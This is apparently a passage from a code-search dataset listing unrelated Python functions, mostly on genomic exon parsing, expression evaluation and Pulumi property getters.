self.classname.startswith(\"npc_V\"): return result\r\n result.extend(commonexpressions)\r\n if \"\"==key: key=self.GetID()\r\n if key in uniqexpressions.keys():\r\n result.extend(uniqexpressions[key])\r\n return result", "def resolve_expression(self):\n stack = list()\n\n for element in self._get_postfix_notation():\n if element in self.OPERATORS: # get two elements from top of stack, push result of operation on stack\n operand_a = stack.pop()\n operand_b = stack.pop()\n value = self._calculate(operand_b, operand_a, element)\n stack.append(value)\n else: # push to stack if number\n stack.append(element)\n\n return stack.pop()", "def expression_phrase(self):\n return self._expression_phrase", "def get_formula_in_list(self):\n return tree_to_string(self.expression)", "def expression(self):\n assert not self._handle_used\n self._expression_used = True\n return self._expression", "def exon_desc(gff3, fasta):\n seqs = {}\n for defline, seq in LocusPocus.fasta.parse(fasta):\n exonpos = defline[1:].split(' ')[1]\n seqs[exonpos] = seq\n\n rnaid_to_accession = dict()\n reported_exons = {}\n exons, cdss = [], {}\n start, stop = None, None\n moltypes = ['mRNA', 'tRNA', 'ncRNA', 'transcript', 'primary_transcript',\n 'V_gene_segment', 'D_gene_segment', 'J_gene_segment',\n 'C_gene_segment']\n for entry in gff3:\n for moltype in moltypes:\n if ('\\t%s\\t' % moltype) in entry:\n accession = re.search(r'accession=([^;\\n]+)', entry).group(1)\n tid = re.search(r'ID=([^;\\n]+)', entry).group(1)\n rnaid_to_accession[tid] = accession\n\n if '\\texon\\t' in entry:\n exons.append(entry)\n elif '\\tCDS\\t' in entry:\n fields = entry.split('\\t')\n pos = '%s_%s-%s%s' % (fields[0], fields[3], fields[4], fields[6])\n cdss[pos] = entry\n elif '\\tstart_codon\\t' in entry:\n start = entry\n elif '\\tstop_codon\\t' in entry:\n stop = entry\n elif entry.startswith('###'):\n if len(exons) == 0:\n continue\n xcept = False\n for exonpos in cdss:\n if ';exception=ribosomal slippage' in cdss[exonpos]:\n xcept = True\n if xcept:\n exons, cdss = [], {}\n start, stop = None, None\n continue\n assert start, 'No start codon for exon(s): %s' % exons[0]\n assert stop, 'No stop codon for exon(s): %s' % exons[0]\n for exon in exons:\n fields = exon.split('\\t')\n assert len(\n fields) == 9, 'entry does not have 9 fields: %s' % exon\n mrnaid = re.search(r'Parent=([^;\\n]+)', fields[8]).group(1)\n exonpos = '%s_%s-%s%s' % (fields[0],\n fields[3], fields[4], fields[6])\n if exonpos in reported_exons:\n continue\n exonlength = int(fields[4]) - int(fields[3]) + 1\n exonseq = seqs[exonpos]\n assert len(exonseq) == exonlength, \\\n 'exon \"%s\": length mismatch; gff=%d, fa=%d' % (\n exonpos, exonlength, len(exonseq))\n gccontent = gc_content(exonseq)\n gcskew = gc_skew(exonseq)\n ncontent = n_content(exonseq)\n context = exon_context(exon, start, stop)\n phase = None\n remainder = None\n if context == 'cds':\n cexon = cdss[exonpos]\n phase = int(cexon.split('\\t')[7])\n remainder = (exonlength - phase) % 3\n values = '%s %s %d %.3f %.3f %.3f %s %r %r' % (\n exonpos, rnaid_to_accession[mrnaid], exonlength, gccontent,\n gcskew, ncontent, context, phase, remainder)\n reported_exons[exonpos] = 1\n yield values.split(' ')\n exons, cdss = [], {}\n start, stop = None, None", "def _get_seg_repr(self, set_speakers=True):\n result = str(self.get_seg_header())\n for seg in self._segments:\n line = seg.get_line()\n if set_speakers:\n line[-1] = self._speaker\n else:\n line[-1] = self._label\n result += \"%s %s %s %s %s %s %s %s\\n\" % tuple(line)\n return result", "def _update_from_exons(self, feature):\n # note that start and end here are in direction of translation\n def start(loc):\n return loc[0][1]\n\n def end(loc):\n if loc[-1][2] == \"+\":\n return loc[-1][1] + loc[-1][3] + 1\n else:\n return loc[-1][1] - loc[-1][3] - 1\n\n if 'exon' in feature:\n # update the feature with the exon locations and sequences\n feature['location'] = [x['location'][0] for x in feature['exon']]\n feature['dna_sequence'] = \"\".join(\n x['dna_sequence'] for x in feature['exon'])\n feature['dna_sequence_length'] = len(feature['dna_sequence'])\n\n # construct feature location from utrs and cdss if present\n elif 'cds' in feature:\n cds = [copy.deepcopy(self.feature_dict[feature['cds']])]\n locs = [] # type: list\n seq = \"\"\n for frag in feature.get('five_prime_UTR', []) + cds + \\\n feature.get('three_prime_UTR', []):\n\n # merge into last location if adjacent\n if locs and abs(end(locs) - start(frag['location'])) == 1:\n # extend the location length by the length of the first\n # location in the fragment\n first = frag['location'].pop(0)\n locs[-1][3] += first[3]\n\n locs.extend(frag['location'])\n seq += frag['dna_sequence']\n\n feature['location'] = locs\n feature['dna_sequence'] = seq\n feature['dna_sequence_length'] = len(seq)\n\n # remove these properties as they are no longer needed\n for x in ['five_prime_UTR', 'three_prime_UTR', 'exon']:\n feature.pop(x, None)\n\n else:\n ValueError('Feature {feature[\"id\"]} must contain either exon or cds data to '\n 'construct an accurate location and sequence')", "def get_seq(self):\n dna_seq = ''\n\n for exon in self.exons: \n dna_seq += self.rna.gene.polymer.get_subseq(\n start=exon.start, end=exon.end)\n\n if self.rna.gene.strand==core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement() \n \n return dna_seq.transcribe()", "def expr(self):\n return self._express", "def concatenate(expression, stream):\n # fork the stream for each subexpression\n streams = itertools.tee(stream, len(expression.children))\n return itertools.chain.from_iterable(\n evaluate(expression, stream)\n for expression, stream in zip(expression.children, streams)\n )", "def get_char_expr(self, param, type='rel', inconn=0, outconn=0):\n if type == 'rel':\n if param == 'm':\n return (\n self.inl[inconn].m.val_SI / self.inl[inconn].m.design)\n elif param == 'm_out':\n return (\n self.outl[outconn].m.val_SI /\n self.outl[outconn].m.design)\n elif param == 'v':\n v = self.inl[inconn].m.val_SI * v_mix_ph(\n self.inl[inconn].get_flow(),\n T0=self.inl[inconn].T.val_SI)\n return v / self.inl[inconn].v.design\n elif param == 'pr':\n return (\n (self.outl[outconn].p.val_SI *\n self.inl[inconn].p.design) /\n (self.inl[inconn].p.val_SI *\n self.outl[outconn].p.design))\n else:\n msg = (\n 'The parameter ' + str(param) + ' is not available '\n 'for characteristic function evaluation.')\n logger.error(msg)\n raise ValueError(msg)\n else:\n if param == 'm':\n return self.inl[inconn].m.val_SI\n elif param == 'm_out':\n return self.outl[outconn].m.val_SI\n elif param == 'v':\n return self.inl[inconn].m.val_SI * v_mix_ph(\n self.inl[inconn].get_flow(),\n T0=self.inl[inconn].T.val_SI)\n elif param == 'pr':\n return (\n self.outl[outconn].p.val_SI /\n self.inl[inconn].p.val_SI)\n else:\n return False", "def stringbuilderexpr(self) :\n\t\ttry :\n\t\t\treturn self._stringbuilderexpr\n\t\texcept Exception as e:\n\t\t\traise e", "def write_exons(input_file, gtf_chrom_dict):\n\n dotexon = open(input_file + '.exon', 'w')\n if input_file[0:3] == 'ref':\n interval_best_matches = MatchingDicts.ref_best_matches\n dotexon.write(\"ExonID\\tChromosome\\tReference(Coordinates[strand]|Transcript[exon_number])\\tMatch_Type\\t\" +\n \"Query(Best_Match_Coordinates|Transcript[exon_number])\\tShared\\tBase_Difference\\tNotes\\n\")\n else:\n interval_best_matches = MatchingDicts.interval_best_matches\n dotexon.write(\"ExonID\\tChromosome\\tQuery(Coordinates[strand]|Transcript[exon_number])\\tMatch_Type\\t\" +\n \"Reference(Best_Match_Coordinates|Transcript[exon_number])\\tShared\\tBase_Difference\\tNotes\\n\")\n gtf_exons = {}\n for chrom in gtf_chrom_dict:\n for strand in gtf_chrom_dict[chrom]:\n len_after = len(gtf_exons) + len(gtf_chrom_dict[chrom][strand][1])\n gtf_exonc = gtf_exons.copy()\n gtf_exons.update(gtf_chrom_dict[chrom][strand][1])\n if len(gtf_exons) < len_after:\n print(\"Dictionary was OVERRITTEN\");\n ids = [(keyid, valid.id, valid.chrom, valid.strand, valid.begin, valid.end, \"next\", gtf_exonc[keyid].id, gtf_exonc[keyid].chrom, gtf_exonc[keyid].strand, gtf_exonc[keyid].begin, gtf_exonc[keyid].end) for keyid, valid in gtf_chrom_dict[chrom][strand][1].items() if keyid in gtf_exonc]\n print(ids)\n exit()\n for exon_id in sorted(gtf_exons):\n exon = gtf_exons[exon_id]\n cinter = Interval(exon.begin, exon.end, exon.gtf_interval)\n bests = interval_best_matches.get(cinter, None)\n # If a match (best match) was found write each match in .exon file\n if bests:\n for bintr, bval in bests.items():\n dotexon.write('{}\\t{}\\t{}-{}[{}]|{}[{}]\\t{}\\t{}-{}[{}]|{}\\t{}\\t({},{})\\t({})\\n'.format(\n exon_id, exon.chrom, cinter.begin, cinter.end - 1, cinter.data.strand, exon.transcript_id,\n cinter.data.transcriptIds[exon.transcript_id], bval[1], bintr.begin, bintr.end - 1,\n bintr.data.strand, '|'.join(['{}[{}]'.format(k, v) for k, v in bintr.data.transcriptIds.items()]),\n bval[0], bintr.begin - cinter.begin, cinter.end - bintr.end, NOTES[cinter.data.note]\n ))\n else:\n dotexon.write('{}\\t{}\\t{}-{}[{}]|{}[{}]\\tNovel\\t-\\t-\\t-\\t-\\n'.format(\n exon_id, exon.chrom, cinter.begin, cinter.end - 1, cinter.data.strand, exon.transcript_id,\n cinter.data.transcriptIds[exon.transcript_id]\n ))\n dotexon.close()", "def expression(self) -> str:\n return pulumi.get(self, \"expression\")", "def expression(self) -> str:\n return pulumi.get(self, \"expression\")", "def _calculate_for_one_side(self, equation, side=\"left_side\"):\n max_width = 0\n for entity in equation.get(\"children\"): # iterate through the entities separated by `+`\n single_entity = entity.get(\"children\")[0]\n num_of_children = len(single_entity.get(\"children\")) # children separated by ::\n width, height = self._calculate_nested_complexes(single_entity, num_of_children - 2) # penultimate entity\n single_entity[\"size\"] = {\"width\": width, \"height\": height}\n if width > max_width:\n max_width = width\n self._current_x, self._current_y = 0, 0\n\n # add complex into compartments\n compartment_entity = single_entity.get(\"children\")[num_of_children - 1]\n compartment_name = compartment_entity.get(\"children\")[0][\"entity\"][\"token\"]\n if self.compartments.get(compartment_name) is None:\n self.compartments[compartment_name] = {\"left_side\": [], \"right_side\": []}\n self.compartments[compartment_name][side].append(single_entity)\n else:\n self.compartments[compartment_name][side].append(single_entity)\n\n if side == \"left\":\n self.x_limit = max_width + 2*X_ENTITY_DISTANCE\n else:\n self.x_limit += max_width + 2*X_ENTITY_DISTANCE", "def evaluate(self, edict):\n if self._evaluationMode == 'full':\n # TODO there's no input-based way to request this mode right now.\n ## It has been manually tested, but needs a regression tests once this is opened up.\n ## Right now consider it as if it wasn't an available feature, cuz it kinda isn't.\n result = Segments.evaluate(self, edict)\n elif self._evaluationMode == 'truncated':\n result, weights = self._createTruncatedEvaluation(edict)\n for r, rom in enumerate(self._roms):\n # \"r\" is the cluster label\n # find ROM in cluster\n clusterIndex = list(self._clusterInfo['map'][r]).index(rom)\n # find ROM in full history\n segmentIndex = self._getSegmentIndexFromClusterIndex(r, self._clusterInfo['labels'], clusterIndex=clusterIndex)\n # make local modifications based on global settings\n delim = self._divisionInfo['delimiters'][r]\n picker = slice(delim[0], delim[-1] + 1)\n result = rom.finalizeLocalRomSegmentEvaluation(self._romGlobalAdjustments, result, picker)\n # make global modifications based on global settings\n result = self._templateROM.finalizeGlobalRomSegmentEvaluation(self._romGlobalAdjustments, result, weights=weights)\n return result", "def process_expr(expr, get, key, val):\n for node in ast.walk(ast.parse(expr.strip(), mode='eval')):\n name = get(node)\n if name not in symbols:\n result.append((name, key, val))", "def exon_finder(tstart,tend,strand,qstart,qend,qlen,qstartphase,qendphase,seqdict,seqname,\n max_offset = 30, is_start = False, is_stop = False, nevermind_atg = False,\n cluster = None,exon_number = None,log_file = open(os.devnull, 'w'),full_pseudoexon_search = True,\n exon_info_dict = False):\n start = None\n end = None\n pseudo = False\n max_coord = len(seqdict[seqname]) - 1\n if strand == \"+\":\n phasestart_offset = (3 - qstartphase) % 3\n phasestop_offset = qendphase\n start_match_offset, stop_match_offset = 3 * (qstart - 1),3 * (qlen - qend)\n elif strand == '-':\n phasestart_offset = qendphase\n phasestop_offset = (3 - qstartphase) % 3\n start_match_offset, stop_match_offset = 3 * (qlen - qend), 3 * qstart\n ideal_start = tstart - phasestart_offset - start_match_offset\n ideal_end = tend + stop_match_offset + phasestop_offset\n pseudo_start = tstart - phasestart_offset\n pseudo_end = tend + phasestop_offset\n gc_start, gc_end = None, None\n for offset in range(0,max_offset + 3,3):\n if start:\n break\n for direction in [1,-1]:\n test_start = ideal_start - offset * direction\n test_seq = genome.Sequence(seqdict[seqname][test_start-1 + phasestart_offset:tend])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"-\":\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n lastcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if lastcodon.upper() in ['TTA','TCA','CTA'] and test_seq.translate().count('*') == 1:\n start = test_start\n break\n elif not \"*\" in test_seq.translate():\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n if is_start and strand == '+':\n if nevermind_atg:\n start = test_start\n break\n else:\n firstcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if firstcodon.upper() == \"ATG\":\n start = test_start\n break\n else:\n splicesite = seqdict[seqname][test_start-3:test_start-1]\n if (strand == '+' and splicesite.upper() == \"AG\") or (strand == '-' and splicesite.upper() == \"AC\"):\n start = test_start\n break\n elif strand == '-' and splicesite.upper() == \"GC\" and not gc_start:\n gc_start = test_start\n if not start:\n if gc_start:\n start = gc_start\n else:\n pseudo = \"P\"\n start = pseudo_start\n for offset in range(0,max_offset + 3,3):\n if end:\n break\n for direction in [-1,1]:\n test_end = ideal_end - offset * direction\n if test_end - start < 3:\n break\n test_seq = genome.Sequence(seqdict[seqname][start - 1 + phasestart_offset:test_end - phasestop_offset])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"+\":\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n lastcodon = seqdict[seqname][test_end - 3:test_end]\n if lastcodon.upper() in ['TAA','TGA','TAG'] and test_seq.translate().count('*') == 1:\n end = test_end\n break\n elif not \"*\" in test_seq.translate() or (is_stop and not \"*\" in test_seq.translate()[:-1]):\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n if is_start and strand == '-':\n if nevermind_atg:\n end = test_end\n break\n else:\n firstcodon = seqdict[seqname][test_end - 3:test_end]\n if firstcodon.upper() == \"CAT\":\n end = test_end\n break\n else:\n splicesite = seqdict[seqname][test_end:test_end + 2]\n if (strand == '+' and splicesite.upper() == \"GT\") or (strand == '-' and splicesite.upper() == \"CT\"):\n end = test_end\n break\n elif strand == \"+\" and splicesite.upper() == \"GC\" and not gc_end:\n gc_end = test_end\n if not end:\n if gc_end:\n end = gc_end\n else:\n pseudo = \"P\"\n end = pseudo_end\n start = max([1,start])\n end = min([end,max_coord])\n if pseudo and full_pseudoexon_search and cluster != None and exon_number != None and exon_info_dict:\n gwexons = genewisesearch(seqdict[seqname],qstartphase,qendphase,strand,\n exon_info_dict[str(cluster) + ':' + str(exon_number)][6], \n search_coords = [ideal_start - 3 - max_offset,ideal_end + 3 + max_offset],\n seqname = seqname,log_file=log_file)\n if gwexons != []:\n return gwexons\n return [[start,end,pseudo]]", "def parse_expression_into_parts(expression):\n raise NotImplementedError(\"complete me!\")", "def parse_ensembl_exons(lines):\n header = []\n for index, line in enumerate(lines):\n # File allways start with a header line\n if index == 0:\n header = line.rstrip().split(\"\\t\")\n continue\n\n exon_info = parse_ensembl_line(line, header)\n\n exon = {\n \"chrom\": str(exon_info[\"chrom\"]),\n \"gene\": exon_info[\"ensembl_gene_id\"],\n \"transcript\": exon_info[\"ensembl_transcript_id\"],\n \"ens_exon_id\": exon_info[\"ensembl_exon_id\"],\n \"exon_chrom_start\": exon_info[\"exon_start\"],\n \"exon_chrom_end\": exon_info[\"exon_end\"],\n \"strand\": exon_info[\"strand\"],\n \"rank\": exon_info[\"exon_rank\"],\n }\n try:\n exon[\"5_utr_start\"] = int(exon_info.get(\"utr_5_start\"))\n except (ValueError, TypeError):\n exon[\"5_utr_start\"] = None\n\n try:\n exon[\"5_utr_end\"] = int(exon_info.get(\"utr_5_end\"))\n except (ValueError, TypeError):\n exon[\"5_utr_end\"] = None\n\n try:\n exon[\"3_utr_start\"] = int(exon_info.get(\"utr_3_start\"))\n except (ValueError, TypeError):\n exon[\"3_utr_start\"] = None\n\n try:\n exon[\"3_utr_end\"] = int(exon_info.get(\"utr_3_end\"))\n except (ValueError, TypeError):\n exon[\"3_utr_end\"] = None\n\n # Recalculate start and stop (taking UTR regions into account for end exons)\n if exon[\"strand\"] == 1:\n # highest position: start of exon or end of 5' UTR\n # If no 5' UTR make sure exon_start is allways choosen\n start = max(exon[\"exon_chrom_start\"], exon[\"5_utr_end\"] or -1)\n # lowest position: end of exon or start of 3' UTR\n end = min(exon[\"exon_chrom_end\"], exon[\"3_utr_start\"] or float(\"inf\"))\n elif exon[\"strand\"] == -1:\n # highest position: start of exon or end of 3' UTR\n start = max(exon[\"exon_chrom_start\"], exon[\"3_utr_end\"] or -1)\n # lowest position: end of exon or start of 5' UTR\n end = min(exon[\"exon_chrom_end\"], exon[\"5_utr_start\"] or float(\"inf\"))\n\n exon[\"start\"] = start\n exon[\"end\"] = end\n exon_id = \"-\".join([str(exon[\"chrom\"]), str(start), str(end)])\n exon[\"exon_id\"] = exon_id\n\n if start > end:\n raise ValueError(\"ERROR: %s\" % exon_id)\n\n yield exon", "def _get_address_calculation(segment, index, file_name):\n\n if segment == \"constant\": # Temp starts at 5\n load_bytecode = [f\"@{index}\", \"D=A\"]\n\n elif segment == \"temp\":\n load_bytecode = [f\"@{int(index) + 5}\", \"D=A\"]\n\n elif segment == \"static\":\n variable_name = file_name + \".\" + index\n load_bytecode = [f\"@{variable_name}\", \"D=A\"]\n\n elif segment == \"pointer\":\n if index == \"0\":\n register = \"THIS\"\n else:\n register = \"THAT\"\n\n load_bytecode = [f\"@{register}\", \"D=A\"]\n\n else:\n load_bytecode = [f\"@{VirtualMachineLibrary._get_symbolic_symbol(segment)}\", \"D=M\", f\"@{index}\", \"D=D+A\"]\n\n full_address_bytecode = load_bytecode + [\"@R13\", \"M=D\"]\n return full_address_bytecode", "def exonString(genes, startref, endref):\n\tstring = (endref-startref+1)*'N'\n\tfor gene in genes:\n\t\tfor exon in genes[gene].coords:\n\t\t\tstart = exon[0] - startref\n\t\t\tend = exon[1] - startref\n\t\t\texonlength = end - start + 1\n\t\t\texonstring = (exonlength)*'F'\n\t\t\tstring = replaceString(string, exonstring, start)\n\t\t\t\n\treturn string", "def expression(self) -> Optional[str]:\n return pulumi.get(self, \"expression\")", "def get_econs(self):\n eham = self.beads.vpath*self.nm.omegan2 + self.nm.kin + self.forces.pot\n eham += self.bias.pot # bias\n for e in self._elist:\n eham += e.get()\n\n return eham + self.eens", "def main(expression):\n\n exception = parse_expression(expression)\n return calc(poland_notation(exception))", "def _process_egocentric(self, signal: egocentric.EgocentricSignal):\n output_signals = []\n output_signals += self._process_egocentric_direction(\n self._get_hparam('egocentric_direction_mode'),\n signal.xz_direction,\n signal.yz_direction)\n output_signals += self._process_egocentric_distance(\n self._get_hparam('egocentric_distance_mode'),\n signal.distance)\n return output_signals", "def getCurveSegment(self, *args):\n return _libsbml.Curve_getCurveSegment(self, *args)", "def get_total_gene_expr(gene, countinfo, Idx, seg_expr, cross_graph_expr):\n if len(seg_expr.shape) == 1:\n n_samples = 1\n else:\n n_samples = seg_expr.shape[1]\n\n if countinfo is None or Idx.sample is None:\n return [np.nan] * n_samples\n seg_len = gene.segmentgraph.segments[1] - gene.segmentgraph.segments[0]\n\n if cross_graph_expr:\n total_expr = np.sum(seg_len * seg_expr.T, axis=1)\n total_expr = total_expr.tolist()\n else:\n total_expr = [np.sum(seg_len*seg_expr)]\n return total_expr", "def create_expression(ex_names, stat_types):\n expression = ''\n if not isinstance(ex_names, list):\n ex_names = list(ex_names)\n\n if not isinstance(stat_types, list):\n stat_types = list(stat_types)\n\n expression = expression_maker(ex_names, stat_types.pop(0))\n for stat_type in stat_types:\n expression = expression + ',' + expression_maker(ex_names, stat_types)", "def getIntrons(self):\n rtrn = []\n for i in range(0,len(self.exonStarts)-1):\n rtrn.append(Interval(self.chr,self.exonEnds[i]+1,self.exonStarts[i+1]-1))\n return rtrn", "def get_expressions( useful_genes, expr_file):\n\n\t#open expressions file\n\texpression_stream = gzip.open(expr_file, \"r\")\n \n\t#reset line number\n\tlinenum = 0\n\n\texpressions_dict = {}\n\n\texpressions_header = [] \n\n\t#initialize progress bar\n\tfor line in expression_stream:\n\n\t\tlinenum += 1\n \n\t\t#skip first line, as those are the labels\n\n\n\t\tif isinstance(line, bytes) and not isinstance(line, str):\n\n\t\t\t\t\tline = line.decode()\n\t\tif line[0] != \"#\":\n\n\t\t\t#parse line\n\t\t\tline_content = line.rstrip().split(\",\")\n\t\t\t#if variant pos and gene match some value\n\t\t\tif line_content[0].split(\".\")[0] in useful_genes :\n\n\t\t\t\t#save the expression data for all the samples\n\n\t\t\t\tvar_expr = line_content[1:]\n\t\t\t\texpressions_dict[line_content[0].split(\".\")[0]] = var_expr\n\t\t\t\t#processed another variant\n\n\n\n\n\t\t\telif line.split(',')[0] == 'Name':\n \n\t\t\t\t#this is our header\n\t\t\t\texpressions_header = line.replace(\"\\n\",\"\").split(',')\n\n\treturn [expressions_dict, expressions_header]", "def calcSegmentCoordinates(self, segment):\n # Write the cpptraj infile\n segment_name_string = segment.getNameString()\n \n coordinates = self.calcCoordinatesOfFile(\"{jn}-run/{namestring}.rst7\".format(jn=self.jobname, \n namestring = segment_name_string))\n # set coordinates in segment\n segment.setCoordinates(coordinates)\n return coordinates", "def update_exon_info(ensembl_info, word, value):\n if \"exon\" in word:\n if \"start\" in word:\n ensembl_info[\"exon_start\"] = int(value)\n elif \"end\" in word:\n ensembl_info[\"exon_end\"] = int(value)\n elif \"id\" in word:\n ensembl_info[\"ensembl_exon_id\"] = value\n elif \"rank\" in word:\n ensembl_info[\"exon_rank\"] = int(value)\n return ensembl_info", "def get_expr(self, expr): # secured\n expr = utils.condition_source_code_keys(expr, self.get_required_parkeys())\n try:\n return expr, MAPPING_VERIFIER.compile_and_check(expr, source=self.basename, mode=\"eval\")\n except crexc.MappingFormatError as exc:\n raise crexc.MappingFormatError(\"Can't load file \" + repr(self.basename) + \" : \" + str(exc)) from exc", "def exeval(expression): \n if len(expression) <= 3: #Assuming no spaces (\" \") between each value given in the expression\n if expression[0] == \"+\":\n return float(expression[1]) + float(expression[2])\n elif expression[0] == \"-\":\n return float(expression[1]) - float(expression[2])\n else:\n if expression[0] == \"+\":\n return float(expression[1]) + exeval(expression[2:])\n elif expression[0] == \"-\":\n return float(expression[1]) - exeval(expression[2:])", "def __str__(self) -> str:\n return \"'{tag}' EDI segment: {elements}\".format(\n tag=self.tag, elements=str(self.elements)\n )", "def expr(self, approxmeth):\n if approxmeth == 'piecewise_poly':\n # see approx_x_piecewise_poly_template.c\n c = [sympy.Symbol('c_' + str(o), real = True) for \\\n o in range(self.order + 1)]\n localy = sympy.Symbol('localy')\n\n return (\n sum([c[o]*localy**o for o in range(self.order + 1)]),\n (DummyGroup('coeffdummy', c),),\n (ArrayifyGroup('coeffdummy', 'lookup_x', 'tbl_offset'),)\n )\n else:\n raise ValueError(\"Unkown approxmeth={}\".format(approxmeth))", "def expression(self):\n return self._expression", "def __call__(self):\n return rstr.xeger(self._xeger)", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def _get_regex(self, ctx):\n _parts = []\n\n with ctx.processing(self):\n for _child in self.children:\n _parts.append(self._as_regex_obj(_child)._get_regex(ctx))\n return \"\".join(_parts)", "def _getvalue_expr_Ellipsis(self, expr: ast.Ellipsis) -> Any:\n return Ellipsis", "def onExpressionBlock(self, match):\n\t\tlines=self.process(match[1])\n\t\tres=[]\n\t\tfor _ in lines:\n\t\t\tres = (res + _[2])\n\t\treturn res", "def get_expr(self, expr, locals={}):\n _locals = {}\n if locals is not None:\n _locals = dict(self._locals, **locals)\n\n expr = expr.strip() # extraneous spaces otherwise interpreted as indentation\n\n self._request_all_objects_in_expression(expr)\n\n _result = self._eval(node=ast.parse(expr, mode='eval').body,\n ctx=dict(operators=self.operators,\n functions=self.functions,\n locals=_locals,\n input=True))\n\n # raise exceptions unable to be raised during `_eval` for technical reasons\n # (e.g. due to expressions with self-referencing local variables that would\n # cause infinite recursion)\n if isinstance(_result, Exception):\n raise _result\n\n return _result", "def test_get_extax_tostring_correct(self):\n got_var, const_jtar = rapid_datatypes.get_rapid_data(self.controller, 'T_ROB1', 'MainModule', 'const_jtarget')\n if not got_var:\n print 'Couldn\\'t get variable. Test will not run.'\n sys.exit()\n extax = rapid_jointtarget.get_extax_tostring(const_jtar)\n self.assertEqual(extax, 'Extax: [Eax_a,Eax_b,Eax_c,Eax_d,Eax_e,Eax_f] = [9E9,9E9,9E9,9E9,9E9,9E9]')", "def get_expression(data_series, probes_to_genes):\n with open(data_series, 'r') as mtx:\n stage_columns = {'all_stages': {'sample_ids': []}} # will always need an average, other stages are determined by the file\n sample_ids = None\n for line in mtx:\n if line.startswith('!Sample_title'):\n sample_stages = [x.strip().replace('\"','').split(\",\")[0] for x in line.split(\"\\t\")[1:]] # this line is likely dataset specific.\n elif line.startswith('\"ID_REF\"'): # this comes after the sample titles\n sample_ids = [x.strip().replace('\"','') for x in line.split(\"\\t\")[1:]]\n # now have the ids and their stages, convert to dict\n \"\"\"\n if named differently, may need to modify this.\n ultimately, stage_columns should be a dictionary with the following properties:\n - the keys are the stage names. \n - each 'stage' dict should have a key 'sample_ids' that has a list the sample_ids belonging to that stage.\n {\n 'stage1': {\n 'sample_ids': ['sample_id1','sample_id2', ..., 'sample_idn']\n },\n 'stage2': {\n 'sample_ids': ['sample_idn+1', ...]\n },\n ...\n }\n \"\"\"\n for i in range(0, len(sample_stages)):\n if sample_stages[i] not in stage_columns:\n stage_columns[sample_stages[i]] = {'sample_ids': []}\n stage_columns[sample_stages[i]]['sample_ids'].append(sample_ids[i])\n stage_columns['all_stages']['sample_ids'].append(sample_ids[i]) # add every sample to this\n elif sample_ids is not None:\n row = [x.strip().replace('\"','') for x in line.split('\\t')]\n \"\"\"\n here, the stage_columns dictionary is being updated with the expression data for each gene.\n {\n 'stage1': {\n 'sample_ids': ['sample_id1','sample_id2', ..., 'sample_idn'],\n 'genes': { <- **NEW KEY**\n 'entrezID-1': ['sample_id1ExpLevel', 'sample_id2ExpLevel', ..., 'sample_idnExpLevel'],\n 'entrezID-2': ['sample_id1ExpLevel', 'sample_id2ExpLevel', ..., 'sample_idnExpLevel'],\n ... (if PERCENTILE_RANK is True, all in dataset are recorded otherwise, just the genes of interest )\n }\n },\n ...\n }\n \"\"\"\n if row[0] in probes_to_genes:\n # get gene from probe\n entrez_id = probes_to_genes[row[0]]\n # add the average expression for all the samples in a stage for the gene\n for stage, stage_data in stage_columns.items():\n stage_data['genes'] = {} if 'genes' not in stage_data else stage_data['genes'] # initialize\n for sample_id in stage_data['sample_ids']:\n # get the index of the sample_id in the row\n sample_idx = sample_ids.index(sample_id) + 1\n if entrez_id not in stage_data['genes']:\n stage_data['genes'][entrez_id] = [float(row[sample_idx])]\n else:\n stage_data['genes'][entrez_id].append(float(row[sample_idx]))\n\n return stage_columns", "def expression(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"expression\")", "def report_exon_overlap(strand1, exons1, strand2, exons2):\n #print(strand1)\n #print(exons1)\n #print(exons2)\n exons1 = convert_2dlst_to_set(exons1)\n first_exon1, last_exon1 = return_first_and_last_exon(exons1)\n exons2 = convert_2dlst_to_set(exons2)\n first_exon2, last_exon2 = return_first_and_last_exon(exons2)\n \n dct_report = dict()\n if not first_exon1 == first_exon2:\n \"\"\" first exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(first_exon1).split(\".\")[1] == str(first_exon2).split(\".\")[1]:\n \"\"\" if first intron-start boundary is the same \"\"\"\n if int(str(first_exon1).split(\".\")[0]) > int(str(first_exon2).split(\".\")[0]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_inside\"\n else:\n dct_report[3] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_outside\"\n else:\n dct_report[3] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"different\"\n else:\n dct_report[3] = \"different\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"same\"\n else:\n dct_report[3] = \"same\"\n\n if not last_exon1 == last_exon2:\n \"\"\" last exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(last_exon1).split(\".\")[0] == str(last_exon2).split(\".\")[0]:\n \"\"\" if last intron-end boundary is the same \"\"\"\n if int(str(last_exon1).split(\".\")[1]) < int(str(last_exon2).split(\".\")[1]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_inside\"\n else:\n dct_report[5] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_outside\"\n else:\n dct_report[5] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[3] = \"different\"\n else:\n dct_report[5] = \"different\" \n else:\n if strand1 == \"+\":\n dct_report[3] = \"same\"\n else:\n dct_report[5] = \"same\"\n return(dct_report[5], dct_report[3])", "def calculate_infix_expression(cls, expression):\n\t\tlogger.info(f\"in the calculate infix expression {expression}\")\n\t\telements = 